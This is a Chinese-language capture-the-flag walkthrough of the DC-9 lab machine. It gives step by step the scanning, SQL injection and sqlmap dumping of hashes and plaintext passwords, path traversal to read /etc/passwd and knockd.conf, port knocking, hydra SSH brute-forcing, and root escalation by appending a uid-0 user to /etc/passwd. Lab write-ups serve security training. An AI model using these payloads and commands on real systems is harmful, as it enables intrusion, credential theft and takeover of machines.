DC-9
打开扫一下:
不知道是不是,nmap扫一下:
看来是没问题了,可以开始攻击了!
信息搜集
端口扫描
nmap -sT -T4 -sV 10.160.58.244
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
目录扫描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.160.58.244 -f -t 50 -x php,txt,html,jpg,png
/.php/ (Status: 403) [Size: 278]
/search.php/ (Status: 200) [Size: 1091]
/icons/ (Status: 403) [Size: 278]
/welcome.php/ (Status: 302) [Size: 0] [--> manage.php]
/results.php/ (Status: 200) [Size: 1056]
/display.php/ (Status: 200) [Size: 2961]
/css/ (Status: 200) [Size: 932]
/index.php/ (Status: 200) [Size: 917]
/includes/ (Status: 200) [Size: 746]
/.html/ (Status: 403) [Size: 278]
/logout.php/ (Status: 302) [Size: 0] [--> manage.php]
/config.php/ (Status: 200) [Size: 0]
/manage.php/ (Status: 200) [Size: 1210]
/session.php/ (Status: 302) [Size: 0] [--> manage.php]
/.php/ (Status: 403) [Size: 278]
/.html/ (Status: 403) [Size: 278]
/server-status/ (Status: 403) [Size: 278]
漏洞利用
敏感目录探查
发现用户名admin
,刷新一下:
尝试sql注入
1' or '1' = '1
有回显,
1' or '1' = '2
无回显,说明sql注入漏洞存在,尝试联合注入:
-1' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() #
未果,继续试探,没成功,sqlmap
梭一下,看看是咋注入的。
POST /results.php HTTP/1.1
Host: 10.160.58.244
Content-Length: 10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.160.58.244
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.160.58.244/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
search=ctf
保存为 1.txt
,登录那个界面保存为 2.txt
,分别测一下:
POST /manage.php HTTP/1.1
Host: 10.160.58.244
Content-Length: 32
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.160.58.244
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.160.58.244/manage.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=dg3l2p0bbh8od1harqv0an2ter
Connection: close
username=admin&password=password
sqlmap -r 1.txt
查到俩:
sqlmap -r 2.txt
好家伙登录倒是没有跑到漏洞。
尝试登录进去看看:
sqlmap -r 1.txt --current-db
[07:00:43] [INFO] fetching current database
current database: 'Staff'
sqlmap -r 1.txt --tables -D "Staff"
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
sqlmap -r 1.txt --columns -T "Users" -D "Staff"
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
sqlmap -r 1.txt --dump -C "Password,UserID,Username" -T "Users" -D "Staff"
Database: Staff
Table: Users
[1 entry]
+--------+----------+----------------------------------+
| UserID | Username | Password |
+--------+----------+----------------------------------+
| 1 | admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+--------+----------+----------------------------------+
得到用户与密码:
admin
856f5de590ef37314e7c3bdf6f8a66dc(transorbital1)
尝试登录:
可能存在文件包含漏洞,找一下上传点:
http://10.160.58.244/addrecord.php?file=../../../../../etc/passwd
查看一下其他数据库:
sqlmap -r 1.txt --dbs
available databases [3]:
[*] information_schema
[*] Staff
[*] users
sqlmap -r 1.txt --tables -D "users"
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
sqlmap -r 1.txt --columns -T "UserDetails" -D "users"
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| password | varchar(20) |
| reg_date | timestamp |
| username | varchar(30) |
+-----------+-----------------+
sqlmap -r 1.txt --dump -C "username,password" -T "UserDetails" -D "users"
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
+-----------+---------------+
ssh爆破
将其放入两个文件内:
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
但是没开放 22 端口,远程目录看一下是不是得knock一下才会开放:
http://10.160.58.244/manage.php?file=../../../../../../etc/knockd.conf
按照顺序敲击就行:
nc 10.160.58.244 7469
nc 10.160.58.244 8475
nc 10.160.58.244 9842
再扫描一下是否开放了 ssh 端口:
nmap 10.160.58.244
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
尝试爆破一下:
hydra -L dcusername.txt -P dcpassword.txt ssh://10.160.58.244
chandlerb UrAG0D!
joeyt Passw0rd
janitor Ilovepeepee
ssh登录
进行登录查询信息:
提权
然后在最后一个用户发现了一些东西:
将字典添加到密码字典中进行爆破:
又得到一个用户:
切换至fredf
查看一下:
file /opt/devstuff/dist/test/test
# /opt/devstuff/dist/test/test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped
传到本地分析一下,但是好复杂,不管他了,先运行一下再说:
Usage: python test.py read append
查一下这个test.py
:
find / -name test.py 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
cat /opt/devstuff/test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
传递三个参数,第一个参数是 ./test
,第二个参数以追加方式写进第三个文件里。
直接就想到了创建一个root权限的用户实现登录!
创建root用户添加进/etc/passwd
创建用户
openssl passwd -1 -salt hack hack
# $1$hack$xR6zsfvpez/t8teGRRSNr.
echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/bin/bash' > /tmp/hack
sudo ./test /tmp/hack /etc/passwd
cat /etc/passwd
尝试切换用户:
切换拿到flag!